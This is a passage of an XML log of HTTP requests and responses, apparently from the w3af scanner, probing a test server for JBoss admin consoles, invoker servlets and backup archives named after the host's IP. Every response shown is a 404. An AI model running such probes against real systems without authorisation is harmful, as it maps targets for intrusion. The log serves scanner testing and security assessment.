                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="204">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="210">
                <http-request>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="216">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="217">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="218">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="219">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="221">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="222">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="223">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="224">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="225">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="226">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="227">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="228">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="229">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="230">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
